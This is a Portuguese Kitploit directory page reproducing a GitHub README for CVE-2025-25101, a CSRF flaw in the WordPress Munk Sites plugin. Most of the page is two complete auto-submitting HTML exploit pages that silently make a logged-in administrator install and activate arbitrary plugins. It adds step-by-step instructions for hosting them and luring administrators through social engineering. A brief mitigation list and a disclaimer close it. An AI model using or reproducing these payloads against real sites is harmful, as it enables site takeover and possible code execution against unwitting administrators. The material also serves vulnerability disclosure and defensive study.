Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-25101 — WordPress Munk Sites plugin <= 1.0.7 - Vulnerabilidade de CSRF para Instalação Arbitrária de Plugins | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-25101
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPhishingEngenharia SocialAprendizado e Educação
GitHubnxploited/cve-2025-25101

CVE-2025-25101

WordPress Munk Sites plugin <= 1.0.7 - Vulnerabilidade de CSRF para Instalação Arbitrária de Plugins

Ver Repositório
113há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚀 CVE-2025-25101 - Plugin Munk Sites para WordPress <= 1.0.7 - CSRF para Instalação Arbitrária de Plugins

📌 Visão Geral

CVE-2025-25101 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no plugin MetricThemes Munk Sites para WordPress (versões ≤ 1.0.7).
Esta vulnerabilidade permite que um atacante não autenticado engane um administrador para instalar e ativar plugins arbitrários, potencialmente levando a Execução Remota de Código (RCE) ou comprometimento do site.

🛑 Versões Afetadas

  • Plugin Munk Sites <= 1.0.7
  • WordPress Qualquer versão onde o plugin esteja ativo

🛡️ Classificação de Segurança (Pontuação CVSS)

PontuaçãoGravidadeVersãoVetor
9.6🔥 CRÍTICA3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 Descrição do Exploit

🛠️ Como a Vulnerabilidade Funciona:

A falha CSRF no plugin Munk Sites permite que um atacante force um administrador do WordPress logado a instalar e ativar qualquer plugin do WordPress sem seu consentimento.
Isso é feito explorando uma solicitação não protegida admin-ajax.php que carece de verificação de token CSRF.

📌 Fluxo do Exploit:

  1. O atacante cria uma página maliciosa contendo a carga CSRF.
  2. A vítima (administrador do WordPress) visita a página do atacante.
  3. O exploit envia silenciosamente requisições ao WordPress para instalar e ativar um plugin arbitrário.
  4. O plugin é instalado e ativado sem qualquer interação do administrador.

💻 Código do Exploit

1️⃣ Exploit CSRF - Instalar Plugin

Esta carga força a vítima a instalar o plugin hello-world.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ Exploit CSRF - Ativar Plugin

Esta carga força a vítima a ativar o plugin hello-world.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 Como Usar

  1. Hospede os arquivos HTML maliciosos (install.html e activate.html) em um servidor controlado pelo atacante.
  2. Engenharia social para um administrador do WordPress visitar install.html.
  3. Uma vez que o plugin esteja instalado, engane-o para visitar activate.html.
  4. O plugin hello-world será instalado e ativado sem consentimento do administrador!

🚧 Mitigação

🔒 Como Proteger Seu Site WordPress:

  • Atualize para a versão mais recente do plugin Munk Sites (se um patch estiver disponível).
  • Use um plugin de segurança WordPress como Wordfence ou Sucuri para bloquear tentativas de CSRF.
  • Restrinja o acesso a admin-ajax.php usando regras de segurança no .htaccess ou configuração do Nginx.
  • Garanta que apenas usuários autenticados e autorizados possam instalar ou ativar plugins.
  • Implemente proteção CSRF usando wp_nonce_field() e check_admin_referer().

📜 Aviso Legal

⚠️ Este exploit é apenas para fins educacionais e de pesquisa em segurança.
⚠️ O uso não autorizado contra sistemas sem permissão explícita é ilegal.
⚠️ O autor não se responsabiliza pelo uso indevido deste código.


⭐ Suporte e Contribuições

Se você considera esta pesquisa valiosa, sinta-se à vontade para ⭐ marcar o repositório com estrela e contribuir reportando novas vulnerabilidades.

Por: Nxploit | Khaled Alenazi

Baixar ferramenta